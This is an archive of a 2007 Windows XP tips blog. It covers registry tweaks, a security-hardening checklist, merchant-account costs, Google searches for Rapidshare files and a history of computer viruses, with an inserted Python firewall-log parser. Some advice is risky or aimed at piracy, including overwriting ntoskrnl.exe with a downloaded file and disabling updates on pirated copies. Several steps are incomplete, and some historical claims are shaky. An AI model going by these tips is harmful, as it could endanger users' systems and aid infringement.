Saturday, September 1, 2007

Hide in the (Network) Neighborhood

Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.

Change Windows XP Boot Screen

This is a very simple trick to do if you have done the same for the logon screen and the start button. There are two ways to do this trick that I know about: one is doing it manually, and the other is using a program called bootxp. I am going to tell you the manual way to do it, but if you want to know the other way just let me know, so I can do an update to the guide. Once you have downloaded your ntoskrnl.exe file, save it to a general location so that you will have easy access to it, like my folder.

Once you have the ntoskrnl.exe file in an easy-access folder, restart your PC in safe mode. Once in safe mode, go to the folder where your files are located.

Now that you are there, copy the file that you want to change your boot screen to. Once you have copied that file, press the Windows key + R and type %windir%\system32 in the Run box to open that folder.

Once there, paste your new file into the folder and overwrite the existing file.

Now that you have your new file in the folder restart your pc as you normally would and your new boot screen should appear. You can download this bootscreen here.


Image and ntoskrnl.exe files provided by

u can go to



A simple tool to find music on the net

Exploseek is a nice simple tool to find music on the net. It is possible to use the major search engines to type your queries, but if you use this tool it will be much easier as some of you have probably seen already. We always try to improve the queries, if possible, and will update it at random times. Further you don't need to install a peer-to-peer program with possible spyware and other security issues, the price to pay is that you will not always find as much as such a program, but on a lucky day you find a load of music.


Getting older programs to run on Windows XP

Most programs run properly on Windows XP. The exceptions are some older games and other programs that were written specifically for an earlier version of Windows. To run your program on Windows XP, you can try the following: run the Program Compatibility Wizard; as an alternative, set the compatibility properties manually; or update your program, drivers, or hardware. These options are covered in detail below.

The Program Compatibility Wizard:
This wizard prompts you to test your program in different modes (environments) and with various settings. For example, if the program was originally designed to run on Windows 95, set the compatibility mode to Windows 95 and try running your program again. If successful, the program will start in that mode each time. The wizard also allows you to try different settings, such as switching the display to 256 colors and the screen resolution to 640 x 480 pixels. If compatibility problems prevent you from installing a program on Windows XP, run the Program Compatibility Wizard on the setup file for the program. The file may be called Setup.exe or something similar, and is probably located on the Installation disc for the program. To run the Program Compatibility Wizard click Start, click Help and Support, click Find compatible hardware and software for Windows XP, and then, under See Also in the navigation pane, click "Program Compatibility Wizard."

Set the compatibility properties manually:
As an alternative to running the Program Compatibility Wizard, you can set the compatibility properties for a program manually. The settings are the same as the options in the Program Compatibility Wizard. To set the compatibility properties for a program manually, right-click the program icon on your desktop or the shortcut on the Start menu for the program you want to run, and then click Properties. Click the Compatibility tab, and change the compatibility settings for your program.

The Compatibility tab is only available for programs installed on your hard drive. Although you can run the Program Compatibility Wizard on programs or setup files on a CD-ROM or floppy disk, your changes will not remain in effect after you close the program. For more information about an option on the Compatibility tab, right-click the option and then click "What's This."

Update your program or drivers:
If your program does not run correctly after testing it with the Program Compatibility Wizard, check the Web for updates or other fixes, as follows:

Check the Web site of the program's manufacturer to see if an update or patch is available.
Check Windows Update to see if a fix is available for the program.
Click Home on the menu bar of Help and Support Center, then click Windows Update in the right pane.

If the program is a game that uses DirectX, ensure that you are using the latest version of DirectX. In addition, check the Web site of the manufacturer of your video card or sound card to see if newer drivers are available for either of them.

Friday, August 31, 2007

Disable Picture And Fax Viewer

We all know that WinXP likes to keep itself held together, and how it doesn't like you uninstalling certain components. Well, the Picture and Fax Viewer is one of these programs which can cause problems if removed incorrectly. It can be disabled safely as follows:

[Start] [Run] type regedit and click [OK]

Navigate to:

HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHandlers

then delete the folder ShellImagePreview under ContextMenuHandlers

Note: If you want to restore the Picture and Fax Viewer :

Create the ShellImagePreview folder and create the String Value (Default)
Assign it the value {e84fda7c-1d6a-45f6-b725-cb260c236066}

NOTE: This tweak doesn't uninstall the program. It removes the association and therefore it cannot be run.

WISE WORDS: Be sure you are right, then go ahead.

Defending WinXP Pro -with what win-xp has to offer

Today I will tell you about various ways of securing WinXP Pro with what win-xp has to offer by default. No extra third-party software to tweak things, which might make your system unstable and push you to the verge of reinstalling all too often.

Note: These are just notes of the changes I made to win-xp pro using win-xp options
after my default install. These changes will not secure your box 100% but they
make a good couple of first steps. They are in no specific order other than the
order in which I performed them.

1. NTFS Partition.
2. Disable Error Reporting
3. Disable Automatic Updates (only if your XP copy is pirated)
4. Disable "Recent Documents" Viewed
5. Setup XP Firewall
6. Setup screensaver password
7. Setup BIOS password
8. Setup "AfterBios" login password
9. Account Modifications
-Rename Admin Account
-Disable Guest Account
-Disable Help_Assistant Account
-Disable Support Account
10. Install a virus scanner.
11. Change Login Screen (default shows user names)
12. Disable Remote Registry (and other services)
13. Disable/Change Auto-Search settings in IE.

1. NTFS Partition (I like being God over system users)

Be sure to install XP onto an NTFS partition so that you (the administrator) can take advantage
of file permissions. You want this option so that "you" can decide who reads, writes,
executes what files.

If you didn't install XP onto an NTFS partition, convert it. To convert to NTFS follow
the instructions below.

Open a command prompt and type "convert c: /FS:NTFS /v"

This command will convert your c: partition from FAT to NTFS in verbose mode.

2. Disable Error Reporting - we don't want Microsoft to know every time we fuck up,
especially if we didn't pay for winxp.

control panel >> performance and maintenance >> system >> advanced >> error reporting
(disable all)

right click "my computer" >> manage >> services and applications >> services >> " stop
and disable" Error Reporting.

3. Disable automatic updates - to update, they must know what we have. That's a NO NO!

NOTE: DO THIS ONLY IF YOUR COPY OF XP IS PIRATED!! I suggest "auto update" if your copy
of XP is legal. If your copy is pirated then I suggest that you stay updated with
the latest fixes and patches manually.

control panel >> performance and maintenance >> system >> automatic updates
(disable updates)

right click "my computer" >> manage >> services and applications >> services >> " stop
and disable" Automatic Updates.

4. Quit listing most recent documents opened under the start button - Don't want the
girlfriend or the parents to find the interesting things you have been viewing lately.

control panel >> appearance and themes >> task bar and start menu >> start menu >>
customize >> advanced

remove the check mark next to "List my most recently opened documents".

5. Block incoming traffic to your winxp box. - Before this change, I scanned my xp box and
found it to have many ports wide open. After this change, I found nothing and xp logged
the attempts in c:\windows\pfirewall.log.

control panel >> network connections >> right click "local area connection" >> properties
>> advanced >> check the box under "Internet Connection Firewall" then choose "settings".

Services Tab - leave all unchecked unless there is a service you are running that people
must be able to access.

Logging Options - Log everything.

ICMP - I left all these unchecked for the time being. (allowing nothing)

(This does not protect you from spyware. It only stops traffic from coming into
your win-xp box (not all traffic); it does not stop traffic from going out.) If you
need to stop traffic from going out and need a more secure firewall, then download a real
firewall like "ZoneAlarm" or "BlackICE".
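
Step 5 turns on logging to c:\windows\pfirewall.log; one way to review that log for the kind of port scan described there is sketched below. This is an added example, not part of the original post: the sample log lines are constructed, and the function names and the three-port threshold are assumptions.

```python
from collections import defaultdict

# Constructed sample in the space-separated, "#Fields:"-headed layout of
# pfirewall.log. Addresses are documentation/private ranges, not real hosts.
SAMPLE_LOG = """\
#Version: 1.0
#Software: Microsoft Internet Connection Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info

2007-08-31 21:14:02 DROP TCP 203.0.113.7 192.168.1.10 4312 135 48 S 1987654321 0 16384 - - -
2007-08-31 21:14:02 DROP TCP 203.0.113.7 192.168.1.10 4313 139 48 S 1987654400 0 16384 - - -
2007-08-31 21:14:03 DROP TCP 203.0.113.7 192.168.1.10 4314 445 48 S 1987654477 0 16384 - - -
2007-08-31 21:14:03 DROP TCP 203.0.113.7 192.168.1.10 4315 3389 48 S 1987654512 0 16384 - - -
2007-08-31 21:15:40 DROP UDP 198.51.100.23 192.168.1.10 1026 137 78 - - - - - - -
2007-08-31 21:16:11 OPEN TCP 192.168.1.10 192.0.2.80 1045 80 - - - - - - - -
2007-08-31 21:16:15 DROP ICMP 198.51.100.23 192.168.1.10 - - 60 - - - - 8 0 -
2007-08-31 21:16:30 CLOSE TCP 192.168.1.10 192.0.2.80 1045 80 - - - - - - - -
this line is truncated DROP
"""


def parse_log(text):
    """Return (records, skipped): one dict per entry, keyed by the #Fields names."""
    fields, records, skipped = [], [], 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            # Take column names from the log itself so extra columns still parse.
            if line.lower().startswith("#fields:"):
                fields = line.split(":", 1)[1].split()
            continue
        values = line.split()
        if not fields or len(values) != len(fields):
            skipped += 1  # truncated or foreign line: count it, do not guess
            continue
        records.append(dict(zip(fields, values)))
    return records, skipped


def dropped_by_source(records):
    """Map source IP -> {"count": n, "targets": {(protocol, dst_port), ...}}."""
    out = defaultdict(lambda: {"count": 0, "targets": set()})
    for rec in records:
        if rec.get("action") != "DROP":
            continue  # OPEN/CLOSE entries are connections the firewall allowed
        entry = out[rec.get("src-ip", "?")]
        entry["count"] += 1
        port = rec.get("dst-port", "-")
        # ICMP entries carry "-" in the port columns; record them with port None.
        entry["targets"].add((rec.get("protocol"), int(port) if port.isdigit() else None))
    return dict(out)


def likely_scanners(records, min_ports=3):
    """Sources whose dropped packets hit at least min_ports distinct ports."""
    result = {}
    for src, info in dropped_by_source(records).items():
        ports = sorted({p for _, p in info["targets"] if p is not None})
        if len(ports) >= min_ports:
            result[src] = ports
    return result


if __name__ == "__main__":
    records, skipped = parse_log(SAMPLE_LOG)
    print(f"{len(records)} entries parsed, {skipped} malformed line(s) skipped")
    for src, info in dropped_by_source(records).items():
        print(f"{src}: {info['count']} dropped packet(s)")
    for src, ports in likely_scanners(records).items():
        print(f"possible port scan from {src}: ports {ports}")
```
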

6. Setting a screensaver password in case you leave some of your sensitive documents open when you walk away.
right click on the desktop >> properties >> screen saver >> check the box next to " On
Resume, Password Protect."

If you don't have a password set on your user account, you can do so in control panel >>
user accounts >> change account.

7. Setting a BIOS password - We don't want anyone rebooting the computer or trying to sneak
into your system while we are away at school or work.

I can't explain how this is done due to the differences between all computers and
how the BIOS settings are entered. If you know what I am talking about then do it. If you
don't know what I am talking about then learn how to do it. A screensaver password is useless
unless you set up a BIOS password.

8. Setting up the "AfterBios" password. Sometimes BIOS passwords are easily cracked. This
password will add extra local login security in case your BIOS pass is cracked. I don't
know about you but I love having to type in 3 passwords and a username to log in to my box.

Start >> run >> type "syskey" >> choose "update" >> choose "Password Startup" >> enter a
password and choose ok.

9. Renaming and Disabling Accounts for administrator, guest, help_assistant and support.
Right click my_computer >> manage >> local users and groups

rename administrator account
disable guest account
disable help_assistant account
disable support account

10. Install Virus Protection............. (We like our uncorrupted data and trojan free system)

Install a virus scanner. Your firewall might protect your system from unwanted hackers but
what about an unwanted virus or trojan? I recommend installing a virus scanner such as
"Norton" or "McAfee".

11. Change Default Login Screen............ (why do we want to share usernames with anyone?)

XP uses the "welcome screen" by default. This screen has the names of all accounts on the
system so that the user only has to click on their name and type a password. Come on now....
We aren't that damn lazy. If we change this screen to the normal login, then prying eyes
will have to know a username and password to get in. Follow the instructions below to change it.

control panel >> user accounts >> change the way users log on or off

uncheck the box next to "Use Welcome Screen" and choose "apply options".

12. Disable Remote Registry..........(why would I need to edit my registry remotely anyway?)

right click "my computer" >> manage >> services and applications >> services >> " stop
and disable" Remote Registry.

NOTE: disable any services running in this area that you aren't using.

13. Disable/Change Auto-search in Internet Explorer. This is not really a security risk but it
is important to some people who prefer to keep their internet surfing to themselves and
away from Microsoft.

Open Internet Explorer >> Click the "search" button >> click the "customize" button >> click
"autosearch settings" >> FOLLOW INSTRUCTIONS BELOW...........

DISABLE: In the "When Searching" drop down menu, select "Do not search from the address bar".
>> click "ok" >> "ok". Type an invalid address in your address bar and see if it
takes you to the msn search page or if it gives a "page not found" error. In this
case, the "page not found" error is what we want.

CHANGE: If you wish not to disable it, but to change it to your favorite
search page, then instead of following the "DISABLE" instructions, follow the instructions
below. Choose "Google Sites (or whatever you prefer)" from the "choose a search provider
to search from address bar" drop down menu >> click "ok" >> "ok"

I personally believe that there is much more to securing your box than this. Maybe I will come up with more information soon. Don't miss it...

Useful information on Internet Merchant Account

Choosing An Internet Merchant Account:

Surf to Google and perform a search on "Internet Merchant Account". The results are staggering (2,300,000 results!) If you have created a web based business and need to accept credit card payments, your choices are limitless. Before you partner with a provider, take time to understand the different components of Internet credit card processing, and know what to look for in a merchant provider.

How It Works:

Accepting credit card payments through your web site actually requires multiple components. Between a paying customer and your bank account, three layers exist:

Payment Gateway - This is the code that will transmit a customer's order to and from an Internet merchant account provider. The payment gateway provides you the ability to accept customer billing information (credit card number, credit card type, expiration date, and payment amount) and the necessary validation steps that must be followed before the credit card is actually billed.

Internet Merchant Account - A Merchant Account is an account with a financial institution or bank, which enables you to accept credit card payments from your clients. The payment gateway actually transmits the billing information to the Internet merchant account provider. Unfortunately, most local banks do not provide Internet merchant account capability.

The main reason why most local financial institutions or banks do not want to provide online merchant accounts is because transactions conducted over the Internet are totally different from face to face transactions where a signature is required to authorize the purchase. This makes online transactions prone to credit card fraud. Fraud protection should be one of your primary considerations when choosing an Internet merchant account provider.

Web Site - Regardless of which merchant provider and gateway service you choose, your web site will need to integrate with your service providers. Most providers include detailed web integration instructions.

How Much Does It Cost ?

Understanding the total costs of your merchant provider can be tricky. Remember my Google example - there are more merchant account providers than there are people looking for internet merchant accounts so ask questions and be picky! Typically, an internet merchant account will have three types of costs:

- Up Front Application Fees
- On Going Fixed Fee
- Discount Rate
- Fixed Transaction Fee
- Termination Fees
- Miscellaneous Fees

Let us discuss each type of cost:

* Up Front Application Fees

Many Internet merchant accounts will require an up front application fee. This fee, supposedly, is to cover their costs for processing your application. In case you choose not to open an Internet merchant account, they still cover their initial costs. Although common, many providers waive these fees and I recommend that you choose a provider that does not require an up front fee.

* On Going Fixed Fee

Almost all Internet merchant providers require a monthly fixed fee or "statement fee" as it is commonly named, which is simply another way to cover their costs and make money. You will be hard pressed to find a provider that does not require this type of fee on a monthly basis. However, do not choose an Internet merchant account that requires more than $10 per month. Additionally, most Internet merchant providers require a monthly minimum (usually $25). The bottom line is that you will be paying at least $25 per month (on top of the monthly statement fee) for your account.

* Discount Rate

Usually, the discount rate will be between 2 and 4 percent. The discount rate is the sales commission the provider earns on each sale. For example, if the discount rate offered is 3%, and you receive a sale over your web site for $20, you will owe 60 cents to your Internet merchant provider.

* Fixed Transaction Fee

Usually between $0.20 and $0.30, the fixed transaction fee is the fixed fee portion of each sale. Unlike the discount rate, the fixed transaction fee is the same for every transaction. Whether you get a $1 sale or a $100 sale, the transaction fee will be the same.

* Termination Fee

A bit more hidden in the small print, a termination fee can apply if you cancel your merchant account within a specified period of time (usually within one year). But beware, some merchant providers require a three year commitment!

* Miscellaneous Fees

If a customer requests a refund and they want their credit card credited, an Internet merchant provider will charge you a separate fee (usually between $10 - $20). Read the contract carefully, as other special fees may apply.

Putting It All Together

Now that the different fees have been explained, let us look at an example set of transactions to help understand what an Internet merchant account may cost your business on a monthly basis.

I have created a simple formula to help you calculate your monthly charges:

Total Charges = Statement Fee + Number of Transactions x (Average Sale x Discount Rate + Fixed Transaction Fee) + (Number of Charge backs x Charge back Fee)

For example, let us say you sell widgets over the Internet. The sales price for each widget is $10. You typically have 100 sales per month and about 5 people request refunds (charge backs). For this example, let us assume you have signed up with Jones&Jones Internet merchant account services and have the following terms:

Discount Rate - 2.5%
Statement Fee - $10
Fixed Transaction Fee - $0.30
Charge back Fee - $15

Using my formula above, your monthly Jones&Jones charges will be:

Total Charges = 10 + 100 x (10 x .025 + 0.3) + (5 x 15) = $140

You can calculate your monthly sales revenue by multiplying your sales volume by your price:

Monthly Sales Revenue = 100 x $10 = $1000

Your Internet merchant provider is costing you 14% of your total sales.

Making Your Decision

Before you choose an Internet merchant provider, understand all of the cost components. Use your current or projected sales data to forecast what your Internet merchant account costs will be. Planning ahead can save you time and money.

I hope this insight will provide a good use for those who want to do business on the web.

WISE WORDS: A man's best friends are his ten fingers.

Change Default Location For Installing Apps

As the size of hard drives increases, more people are using partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed if your . However, you can change the default installation drive and/ or directory by using a Registry hack.

Run the Registry Editor (regedit) and go to


Look for the value named ProgramFilesDir. By default, this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Thursday, August 30, 2007

Search Google For Rapidshare Links

If you wanna find some applications, files etc on via google, do the following.

Paste this into the google search box (not the address bar):

site: -filetype: zip OR rar daterange: 2453402-2453412

* this searches the site for any file that has extension .rar or .zip, and
has been indexed between 1-11 February.

try this one:-

dvd site: -filetype: zip OR rar daterange: 2453402-2453412

* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any application posted with the word dvd in it will be found.

There are mainly three criteria to keep in mind when doing this search.

1. site: your site of choice to search

2. filetype: filetypes you want to search,if you put a "OR" after the first
filetype you can add more.

3. daterange: (start date-end date)

* this uses the "Julian calendar", converter can be found here:

Disable Compression On Xp, NTFS partition, Disk Cleanup

On an NTFS partition, Disk Cleanup can compress old files to save space. But calculating the savings and performing the compression often take a long time, and on some systems, Disk Cleanup hangs during the process. If that happens, or if you don't care to wait, use this Registry tweak to disable the compression: Delete the key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Compress Old Files.

WISE WORDS: The fear of Lord is the beginning of wisdom.

Evolution Of Computer Viruses History Of Viruses

part 1:

Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as Michelangelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.

part 2:

This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time. In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention. Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.

part 3:

This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.

part 4:

In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet, however, caused virus creators to change their objectives and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services, like e-banking or online shopping, brought in another change. Some virus creators started writing malicious code not to infect computers but to steal confidential data associated with those services. Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computer’s hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite, have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this.

part 5:

Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed, years later, the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and it was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.

part 6:

Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Cloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PC users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far fewer programmers know assembler language than are familiar with high-level languages, which are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family, designed to steal personal information from infected computers, were identified.

part 7:

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses. As these developed, worldwide epidemics also emerged, such as the first one, caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through an interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint became ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind JavaScript in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

